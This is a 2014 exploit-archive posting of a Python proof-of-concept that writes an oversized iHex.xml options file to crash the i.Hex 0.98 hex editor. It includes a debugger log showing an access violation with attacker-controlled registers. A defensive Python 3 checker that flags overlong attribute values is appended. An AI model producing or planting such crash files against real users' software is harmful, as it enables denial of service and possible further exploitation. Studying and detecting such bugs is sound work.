
i.Hex 0.98 Local Crash Proof Of Concept

Posted on 07 November 2014

#!/usr/bin/python
#Exploit Title:i.Hex Local Crash Poc
#Homepage:http://www.memecode.com/ihex.php
#Software Link:www.memecode.com/data/ihex-win32-v0.98.exe
#Version:i.Hex-v0.98 (Win32 Release)
#Description:i.Hex is a small and free graphical Hex Editor for Windows..
#Tested on:Win7 32bit
#Exploit Author:metacom --> twitter.com/m3tac0m
#Date:05.11.2014
# Python 2 script (print statements, byte strings).
'''
Immunity Debugger Log data

EAX 0135B8F8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ECX 41414141
EDX 41414141
EBX 01363FA0
ESP 0012F6D8
EBP 0012F700
ESI 0135B8F0
EDI 005F0000
EIP 77B85FBD ntdll.77B85FBD

Press Shift+9
Log data, item 0
 Address=77B85B44
 Message=[15:56:05] Access violation when reading [41414141]
'''

print " [*]Vulnerable Created iHex.xml!"
print "[*]Copy iHex.xml to C:\\Program Files\\Memecode\\i.Hex"
print "[*]Start i.Hex"
print "[*]------------------------------------------------"

# 100000 'A' bytes, placed inside the LittleEndian attribute value below
poc="\x41" * 100000

# header decodes to: <?xml version="1.0" encoding="UTF-8" ?> <Options IsHex="1" LittleEndian="
header = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22"
header += "\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a\x3c\x4f\x70\x74\x69\x6f\x6e\x73\x20\x49\x73\x48\x65\x78\x3d\x22\x31\x22\x0a\x09"
header += "\x20\x4c\x69\x74\x74\x6c\x65\x45\x6e\x64\x69\x61\x6e\x3d\x22\x0a" + poc

# footer decodes to: " Pos="100,100,500,400"> <Mru Items="0" Item0="" /> </Options>
footer = "\x22\x0a\x09\x20\x50\x6f\x73\x3d\x22\x31\x30\x30\x2c\x31\x30\x30\x2c\x35\x30\x30\x2c\x34\x30\x30\x22\x3e\x0a\x09\x3c\x4d"
footer += "\x72\x75\x20\x49\x74\x65\x6d\x73\x3d\x22\x30\x22\x0a\x09\x09\x20\x49\x74\x65\x6d\x30\x3d\x22\x22\x20\x2f\x3e\x0a\x3c\x2f"
footer += "\x4f\x70\x74\x69\x6f\x6e\x73\x3e\x0a"

payload= header + footer

# Write out our malicious file
writeFile = open ("iHex.xml", "wb")
writeFile.write( payload )
writeFile.close()
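A pre-load check for the options file, added here as an example and not part of the original post: it parses an iHex.xml and reports any attribute value longer than a limit, which is the condition the PoC creates in LittleEndian. The element and attribute names are decoded from the PoC's header and footer bytes; MAX_ATTR_LEN, audit_options and build_sample are assumptions of this example, which is written for Python 3.

```python
import xml.etree.ElementTree as ET

# Assumed ceiling for a sane option value. The page does not state the size
# of the buffer i.Hex uses, so set this to your own policy.
MAX_ATTR_LEN = 1024


def audit_options(xml_bytes, limit=MAX_ATTR_LEN):
    """Return (tag, attribute, length) for every attribute value over limit.

    Raises ValueError when the input is not well-formed XML: a config that
    cannot be parsed here should not be handed to the editor either.
    """
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError as exc:
        raise ValueError("not well-formed XML: %s" % exc)
    findings = []
    for elem in root.iter():
        for name, value in elem.attrib.items():
            if len(value) > limit:
                findings.append((elem.tag, name, len(value)))
    return findings


def build_sample(little_endian):
    """Constructed sample with the same layout as the file the PoC writes."""
    return (
        '<?xml version="1.0" encoding="UTF-8" ?>\n'
        '<Options IsHex="1"\n\t LittleEndian="%s"\n'
        '\t Pos="100,100,500,400">\n'
        '\t<Mru Items="0"\n\t\t Item0="" />\n'
        '</Options>\n' % little_endian
    ).encode("utf-8")


if __name__ == "__main__":
    # Constructed inputs: an ordinary value and an oversized one.
    for label, value in (("normal", "1"), ("oversized", "A" * 100000)):
        print(label, audit_options(build_sample(value)))
```
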

 
